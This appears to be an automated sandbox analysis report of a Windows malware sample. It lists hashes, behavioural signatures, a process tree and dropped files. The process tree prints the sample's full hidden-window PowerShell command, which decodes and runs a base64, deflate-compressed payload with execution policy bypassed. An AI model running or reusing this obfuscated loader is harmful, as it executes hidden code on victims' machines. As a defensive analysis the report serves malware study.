Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-10-2024 15:30

General

  • Target

    3ac5e263fa5670a50c4ad7060afc7e8f_JaffaCakes118.exe

  • Size

    126KB

  • MD5

    3ac5e263fa5670a50c4ad7060afc7e8f

  • SHA1

    7d00b96206ff3f1636812d016d504d43cea1a808

  • SHA256

    fcbe422cd0a036961659aabe2af0d909f07c3dcda9bffa3b8ccb54482614ab06

  • SHA512

    a773e6326dbbee1d37a1279ad0a5d12aee8259023378cbde18879ca66cc83acf20cfccd389ecdbe005793560a6f0ea8d8a05dda2dc32b03de8923c5c6060100d

  • SSDEEP

    3072:o/25jvDSgsqsb5Uh28vAbTV1WW69B9VjMdxPedN9ug0z9TBfFSFMHM:Dtzsb5Uh28+V1WW69B9VjMdxPedN9ug5

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3ac5e263fa5670a50c4ad7060afc7e8f_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\3ac5e263fa5670a50c4ad7060afc7e8f_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2664
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C1F8.tmp\C1F9.tmp\C1FA.bat C:\Users\Admin\AppData\Local\Temp\3ac5e263fa5670a50c4ad7060afc7e8f_JaffaCakes118.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4528
      • C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe
        C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe -NoP -Window Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"zVZNb9s4EL3rVxCGgEi1JFC2YrgxDDRpNt1gt25Qu92D4IMijW1uaFIgqcRK1v+9o1j+kJMtgh4WCx0ok29mnmbeDG2nZEg+tKz4kvPrZS6VcVp3oATwbifIOG+5U5IXt5ylRJvE4AIrg+fkWpgbo8h3pkyR8HPOZerUew8eKZgwZFWvZb0+uoNfjvNRQWJgssAl28Ypar/3HtlHrt8OYtc7VfTWByu+KA3E06k9mtxMVCL0kpmhF76L+oPDrZhOh3QVXgx2eA2pFNmxSXN3Z2ULeZ6moPXQniVcw2Ciyid7LNM7MMMRPPhfbv+G1JARmGCzq+vViQ/3zrNMoZerZMl4OT07w28BhYAHqe68+KX1pMwBYZdzlSyb5zdKGplKXiO+Zbk7qAkFH6UQyMY5KXSQS8kDYfJAqvmJF3a67iD+Llk23YLHIDLnMFXHgK+QAruHJmadJiZdPB3kxagC1gNbFWIiTcKHdHAl1W9JunDsa5HBijBBGhWJaBBE3an7tLfZvb3rnPbaGzv0OWNKmwlbwtA5yPVlJSDcdML3lHohPvT5ibcHfzCRVakxqetWmf/MOGebAmsn/oa570VTZx8zpJQicvyMGIxNoow/5gA58TXp0U3NkUCVl/9R0WtGb6z6Fr0pe1PuL0C70h/j9kG51OD8qhyOuu2tirDYjDj/nRSIT/YSJP4cUAzEl4rsPtclT5ap1KFx+h7wGpfawDJ4WWLixK+c/VQo5DWLhmDGBqfp8nXgkXImae5att5rJnzfCcJePwijKAi73ROP9GmfuuQfIgvji4LzAbFz/Lr4XKmkIreZ4NcCx7tIwWnd4lxteSRyEbhCIHrfySc/cvSI59Syyzf4iy+YQZb3oDAXFXOJWel20KdH3fZpFa3EMV05XF1cWQ8LxoE4GMHn5ufGWLSKSbtJtfTsx/YpKujf033Fk7lGbyMpwCVra4ZScGw2DJELw7hAouqt3cYISM5mFbutuyNGn8BUFxKKEG83vJSC3xORcXDRyg+na8s2aIu68KvCEX8Jy1tQlzBjghkmsYVS4o8SlGXrLya6nRbxBf7SeZICed65KkRaITXx80Rrs1BFVSBs0LOzxmVPPbsM/gQxNwuPrrrYALhE1LW2zL8WwmADBM+qlPkY1D1D8QefE6UXCa9KKPOyyiChWLfNNY1NtQq2aXddj+yCoP7Mtur1/4CqZe3VpnebimkM47or+72I0nrwrNfWDw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:800

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\C1F8.tmp\C1F9.tmp\C1FA.bat

    Filesize

    4KB

    MD5

    91f2bf2519a03ae2b1fb8ed1dcd7fe6c

    SHA1

    71958fbbdd32ebe90a813de7a80d238b0956df24

    SHA256

    245358e6950654bdaee53f96394007596841084bd7838c83342d69accd46850c

    SHA512

    26e3ecef9ef421e5b9e0b7057d3e73087db0eb5a52dacb36f883f3f89cf931a15a418325438bc20b87885380d4d9bb49a34a4d8a4f8c01ddf98c2a0a0263944d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ak0v5kxt.rjo.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/800-9-0x0000000005570000-0x00000000055D6000-memory.dmp

    Filesize

    408KB

  • memory/800-2-0x000000007532E000-0x000000007532F000-memory.dmp

    Filesize

    4KB

  • memory/800-4-0x0000000075320000-0x0000000075AD0000-memory.dmp

    Filesize

    7.7MB

  • memory/800-6-0x0000000075320000-0x0000000075AD0000-memory.dmp

    Filesize

    7.7MB

  • memory/800-7-0x0000000004D20000-0x0000000004D42000-memory.dmp

    Filesize

    136KB

  • memory/800-8-0x0000000005500000-0x0000000005566000-memory.dmp

    Filesize

    408KB

  • memory/800-3-0x0000000002700000-0x0000000002736000-memory.dmp

    Filesize

    216KB

  • memory/800-5-0x0000000004ED0000-0x00000000054F8000-memory.dmp

    Filesize

    6.2MB

  • memory/800-19-0x00000000056A0000-0x00000000059F4000-memory.dmp

    Filesize

    3.3MB

  • memory/800-20-0x0000000005D00000-0x0000000005D1E000-memory.dmp

    Filesize

    120KB

  • memory/800-21-0x0000000005D20000-0x0000000005D6C000-memory.dmp

    Filesize

    304KB

  • memory/800-22-0x0000000007430000-0x0000000007AAA000-memory.dmp

    Filesize

    6.5MB

  • memory/800-23-0x0000000006210000-0x000000000622A000-memory.dmp

    Filesize

    104KB

  • memory/800-24-0x000000007532E000-0x000000007532F000-memory.dmp

    Filesize

    4KB

  • memory/800-25-0x0000000075320000-0x0000000075AD0000-memory.dmp

    Filesize

    7.7MB

  • memory/800-29-0x0000000075320000-0x0000000075AD0000-memory.dmp

    Filesize

    7.7MB